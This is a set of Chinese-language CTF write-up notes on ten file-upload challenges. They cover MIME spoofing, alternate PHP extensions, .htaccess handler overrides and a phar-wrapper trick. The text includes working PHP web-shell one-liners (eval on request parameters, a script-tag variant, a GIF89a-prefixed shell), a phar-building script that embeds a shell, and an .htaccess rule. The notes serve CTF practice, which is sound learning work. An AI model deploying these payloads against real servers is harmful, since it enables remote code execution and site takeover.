1.[SWPUCTF 2021 新生赛]easyupload1.0
MIME验证不必多说
flag在phpinfo里面
2.[SWPUCTF 2021 新生赛]easyupload2.0
后缀名是.php .php3 4 5 .pht phtml 都是指向php解析器
3.[SWPUCTF 2021 新生赛]easyupload3.0
传个shell.jpg和,.htaccess直接把shell.jpg解析为php
4.[LitCTF 2023]作业管理系统
就加了一个弱密码admin/admin其他跟上面一样的
5.[NISACTF 2022]bingdundun~
文件上传的奇葩,玩得好花。
仅可以上传墩墩喜欢的【图片或压缩包】文件类型哦
bp改包发现是白名单。
上传图片没有hatccess文件大概率行不通,只能看看压缩包了。在压缩包里面放个马
NSSCTF标签伪协议和phar,大概就是用phar伪协议
上传一个里面放有马的压缩包上传,然后用phar去读取
?bingdundun=phar://69033c43578ef97b1f22affbd929ad16.zip/1 (表示读取压缩里面的1.php)
然后还是上蚁剑。
后面发现,phar也可以。但是要写生成脚本。这里赋一个。
<?php
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("exp.php", "<?php eval(\$_GET['1']);"); //添加要压缩的文件,有时候会用到读取这里面的
$phar->stopBuffering();
6.[GXYCTF 2019]BabyUpload
MIME上传个.htaccess
不让上传带有<?php的,这里用下面的绕过
<script language='php'>@eval($_POST["a"]);</script>
7. [UUCTF 2022 新生赛]ez_upload
后缀用jpg.php
8.[SWPUCTF 2022 新生赛]Ez_upload Leafzuz
MIME验证加后缀黑名单加文件内容过滤
9. [WUSTCTF 2020]CV Maker
(题目漏洞,flag放在phpinfo里面)网站刚好有一个phpinfo.php
注册后可以修改头像。会对文件头检查,我这直接在一个真实图片的后面插入一个马
10.[SWPUCTF 2022 新生赛]file_master Leafzuz的WriteUp
读取index.php 过滤条件:MIME,文件头,图片很小,不能有php
和上题一样直接拿一个真实的小图,在后面加上不含php的马
<?=
@eval($_REQUEST["cmd"]);
?>
GIF89a
<script language ="php"> phpinfo();eval($_REQUEST['cmd']); </script>
<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>